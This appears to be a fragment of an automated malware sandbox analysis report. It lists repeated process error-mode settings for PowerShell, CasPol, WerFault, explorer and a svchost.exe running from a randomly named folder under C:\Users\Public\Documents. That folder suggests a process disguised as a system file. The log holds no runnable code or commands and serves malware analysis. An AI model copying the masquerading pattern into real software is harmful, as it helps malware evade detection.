        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
